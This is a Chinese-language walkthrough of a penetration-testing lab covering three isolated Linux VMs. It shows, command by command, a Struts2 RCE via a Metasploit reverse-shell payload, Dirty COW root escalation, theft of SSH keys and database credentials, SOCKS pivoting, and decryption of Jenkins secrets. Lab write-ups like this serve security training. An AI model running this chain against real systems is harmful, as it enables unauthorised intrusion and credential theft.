THP-CSK 靶场 · Linux 内网横向渗透全流程

🛡️ THP-CSK 靶场 · Linux 内网横向渗透全流程

靶场编号： #189 · 难度方向： Web DMZ → 内网横向 涉及技术： Struts2 RCE · 内核提权 · SSH 密钥复用 · SOCKS 代理穿透 · Jenkins 凭据解密

📋 靶场概述

本次靶场共三台 Linux 主机，模拟一个典型的企业内网"站库分离"架构：

• 靶机账号密码：hacker / changeme
• 主要攻击路径：利用 .10 上的 Struts2 漏洞获取 Shell → 提权 → 横向移动到 .30 和 .50

🗺️ 整体攻击思路

外网入口(.10)  →  代码执行 / 提权  →  内网横向(.30)  →  数据库(.50)

📥 靶场文件下载

https://secplanet.sfo2.cdn.digitaloceanspaces.com/THP-csk-lab.zip

🔧 环境搭建

VMware 路径： 编辑 → 虚拟网络编辑器 → 更改设置

修改子网 IP 为 172.16.250.0，类型保持"段内可通讯"即可，用来模拟内网隔离环境。

🔍 信息收集

打开三台虚拟主机，先扫一下存活主机：

nmap -sn 172.16.250.0/24

刚好三台，符合预期。

然后对这三台机器做全端口详细扫描：

nmap -A -p- 172.16.250.10 172.16.250.30 172.16.250.50

扫描结果汇总：

💡 很明显：.10 是入口机，.30 / .50 是横向移动目标，只有 SSH 对外，说明内网还有服务隐藏着。

🌐 Web 踩点

访问 80 端口：

http://172.16.250.10/

跑的是 OpenCms：

访问 8080 端口：

http://172.16.250.10:8080/

标准的 Tomcat 页面：

尝试在 Kali 上搜 OpenCms 的漏洞：

searchsploit opencms

基本都是 XXE 文件读取，没什么直接 RCE 的利用，先搁置。

再跑一下目录：

dirsearch -u http://172.16.250.10/

也没发现啥有用的。到这里其实有点没头绪，后来翻 WP 才知道有这么一个路径：

http://172.16.250.10/struts2-showcase/showcase.action

这是 Struts2 Showcase Demo，官方演示程序，很多靶场都会装这个当入口。看到这个基本就知道该怎么打了。

💥 漏洞利用：Struts2 RCE（CVE-2017-5638）

打开 MSF，搜 Struts2：

msfconsole
search struts2

选用模块：

use exploit/multi/http/struts2_content_type_ognl

📌 对应漏洞：CVE-2017-5638，通过 Content-Type 头注入 OGNL 表达式实现远程代码执行。

注意默认 payload 是 Windows 的：

目标是 Linux，要手动切换：

set payload linux/x86/meterpreter/reverse_tcp
set RHOSTS 172.16.250.10
set RPORT 80
show options

配置没问题，直接打：

run
getuid

✅ 成功拿到 tomcat 权限，下一步是提权到 root。

⬆️ 提权

先获取交互式 Shell：

shell
python -c 'import pty; pty.spawn("/bin/bash")'  #不行
python3 -c 'import pty; pty.spawn("/bin/bash")'

⚠️ 注意：这台机器没有 python，只有 python3。

或者用这个也行：

script -qc /bin/bash /dev/null

方法很多，选一个能用的就行。

🔎 提权侦察

先找 SUID 文件：

find / -perm -u=s -type f 2>/dev/null

没啥能用的。

试一下 sudo：

sudo -l

需要密码，跳过。

查内核版本，看看有没有内核漏洞可以打：

uname -a

❌ 尝试 overlayfs（失败）

searchsploit overlayfs

复制利用代码：

searchsploit -m linux/local/37292.c

退回 MSF session，上传文件：

upload 37292.c /tmp/37292.c

编译并执行：

gcc 37292.c -o exp
chmod 777 ./exp
./exp

有警告但能编译。结果执行发现不适配当前内核环境，宣告失败。

❌ Metasploit overlayfs 模块（失败）

📌 模块：40688.rb

use exploit/linux/local/overlayfs_priv_esc
background
set SESSION 1
run

同样失败，这台机器的内核版本就是不吃这套。

❌ Dirty COW 40839（失败，机器崩了）

searchsploit dirty cow

searchsploit -m linux/local/40839.c
sessions 1
upload 40839.c /tmp/

shell
cd /tmp
gcc 40839.c -o cow -lcrypt -lpthread
chmod +x cow
./cow

输入密码 123456 后 su firefart……又崩了。

✅ Dirty COW 40616（成功！）

searchsploit -m linux/local/40616.c
upload 40616.c /tmp/
shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
cd /tmp
gcc 40616.c -o cowroot -pthread
chmod +x cowroot
./cowroot

🎉 成功提权！

执行完之后，建议立刻运行以下命令保持利用稳定，不然系统很容易随机崩掉：

echo 0 > /proc/sys/vm/dirty_writeback_centisecs
echo 1 > /proc/sys/kernel/panic
echo 1 > /proc/sys/kernel/panic_on_oops
echo 1 > /proc/sys/kernel/panic_on_unrecovered_nmi
echo 1 > /proc/sys/kernel/panic_on_io_nmi
echo 1 > /proc/sys/kernel/panic_on_warn

⚠️ 千万别一次性全部复制粘贴执行！ 一条一条来，否则可能造成系统崩溃。

关于把自己主机干蓝屏这件事……（doge）

🔎 内网信息收集

提权成功后，先看看网卡信息：

ifconfig

只有一个网段，确认网络拓扑。

然后去翻一下应用配置文件，找数据库连接信息：

cat /opt/tomcat/webapps/kittens/WEB-INF/config/opencms.properties

找到了关键信息：

# WEB站点
IP地址：172.16.250.10
端口号：80
​
# 数据库
IP地址：172.16.250.50
端口号：3306
​
# 站库分离
账号密码：store / WTWOIUEfjSLeij

📝 这就是典型的站库分离架构，Web 和数据库分别跑在不同机器上。

翻一下历史命令，找到SSH 连接记录：

cat ~/.bash_history

发现有 SSH 连接记录，再去读一下密钥：

cat ~/.ssh/id_rsa

复制 SSH 私钥到本地（保存为 ssh.txt），尝试免密登录 .30 机器：

ssh -i ssh.txt root@172.16.250.30

✅ 成功登录 .30 机器！

🔀 横向移动到 .30（Jenkins）

进去之后发现有个用户叫 jenkins：

合理怀疑这台机器跑了 Jenkins 服务。查一下本机监听的端口：

netstat -tlnp

参数说明：-t TCP / -l 监听中 / -n 数字显示 / -p 显示进程

果然有 8080 端口在监听，但之前 nmap 外部扫描没扫到，说明这个服务只对内网开放。

直接从外部访问果然不行：

在 .10 机器上试试：

curl http://172.16.250.30:8080

有响应！那就在 .10 建立 SOCKS 代理节点，把流量代理过去。

🧭 建立 SOCKS 代理穿透内网

退回 MSF session（不要 ctrl+c 或 exit，会话会直接中断！ 用 background）：

background

建立路由

use multi/manage/autoroute
set session 4
run

让流量通过 .10 机器走。

建立 SOCKS 代理

use auxiliary/server/socks_proxy
set SRVPORT 1080
set VERSION 4a
run

确认模块运行状态：

jobs

配置 proxychains

# /etc/proxychains4.conf
socks4 127.0.0.1 1080

尝试用 proxychains firefox 结果不好使，有限制，比较麻烦，直接改浏览器代理配置更省事。

可以正常访问了！

💡 原理说明： 流量走 127.0.0.1:1080，MSF 监听到数据后通过 .10 节点转发给 .30 机器，实现外部访问内网服务。

让自己的电脑也能用这个代理

如果想让本机（非 Kali）也通过这个节点访问内网，需要把监听地址从 127.0.0.1 改为 0.0.0.0（允许任意来源连接）：

jobs -k 0   # 先关掉之前那个
​
use auxiliary/server/socks_proxy
set SRVHOST 0.0.0.0   # 关键：允许任何机器连接你的 Kali
set SRVPORT 1080
set VERSION 4a
run

方式一：浏览器插件（推荐）

配置 SOCKS4 代理指向 Kali IP:1080，启动就能访问了。

方式二：代理工具（Proxifier）

结果测试半天浏览器就是不走流量，试了半天才知道是软件问题

⚠️ 注意：Proxifier Portable Edition（非安装版）不注入系统驱动，无法拦截任意进程的流量，Applications 写 Any 完全没用。所以这里用 Portable 版试了半天没反应，换回浏览器插件解决。

也可以直接用 curl 测试通路：

curl --socks4 172.16.250.128:1080 http://172.16.250.30:8080/

有正常回显，通信没问题。

🔑 Jenkins 凭据窃取

继续访问 Jenkins：

http://172.16.250.30:8080/jenkins/

💡 直接访问 8080 是 Tomcat，Jenkins 路径是 /jenkins/，用proxchains dirsearch还把msf扫崩了，翻wp才知道路径是/jenkins/……

点进去可以看到有两个凭据账户：

第一个：root 账户

就是之前从 .10 拿到的那个 SSH 私钥，对应 .30 的 root 登录。

第二个：db_backup 账户

密码前端是隐藏的，简单改改

发现一段加密字符串：

2M0vgELkx9OMFTP8UCoNNneTI7CVjBr9sKSCtKoUl08=

这是数据库用户（.50 机器）的密码，明显加密了，需要解密。

Jenkins 自带脚本控制台，可以直接解密：

println hudson.util.Secret.decrypt("2M0vgELkx9OMFTP8UCoNNneTI7CVjBr9sKSCtKoUl08=")

解密得到明文密码：

)uDvra{4UL^;r?*h

📌 Jenkins 使用 hudson.util.Secret 对凭据加密，密钥存储在 Jenkins 主目录的 secret.key 文件中，通过 Groovy 脚本可以直接在 Jenkins 内解密。这是 Jenkins 凭据审计中的常见利用点。

🎯 横向移动到 .50（数据库服务器）

拿到密码，可以直接 SSH 连接 .50 的数据库备份账户：

ssh db_backup@172.16.250.50

看一下 sudo 权限：

sudo -l

惊喜，直接可以提权：

sudo su

✅ 成功获取 .50 数据库服务器的 root 权限！

📊 完整攻击链回顾

[kali外网]
  │
  ▼
.10 (172.16.250.10)
  ├─ Struts2 CVE-2017-5638 → RCE (tomcat权限)
  ├─ DirtyCOW 40616 → root提权
  ├─ 读取 opencms.properties → 发现数据库IP(.50)
  └─ 读取 ~/.ssh/id_rsa → SSH私钥
  │
  ▼
.30 (172.16.250.30)
  ├─ SSH私钥免密登录 root
  ├─ Jenkins 8080 仅内网开放
  ├─ MSF autoroute + socks_proxy 穿透内网
  └─ Jenkins 脚本控制台解密凭据
  │
  ▼
.50 (172.16.250.50)
  ├─ db_backup + 解密密码 SSH登录
  └─ sudo su → root

💬 踩坑总结

这次靶场环境问题确实有点多，整理一下踩过的坑：

• 🐛 浏览器经常崩，没错自己的浏览器打不开，不知道什么问题
• 🐛 MSF session 掉线，msf的权限太容易掉了
• 🐛 靶机不稳定，Dirty COW 打了好几次才成功，40839 和 Metasploit 模块都失败了，最后 40616 才行
• 🐛 Proxifier Portable 无效，非安装版不注入驱动，Any 进程规则没用，直接改浏览器代理省事多了
• 🐛 Jenkins 路径不直觉，直接访问 8080 是 Tomcat，Jenkins 藏在 /jenkins/ 下，没 WP 真不好找
• 🐛 proxychains + dirsearch 把 MSF 扫崩了……真的难崩（加参数-t）
• 🐛 自己电脑还崩过一次

蚌埠住了，但最后全打通了，还是值得的 🎉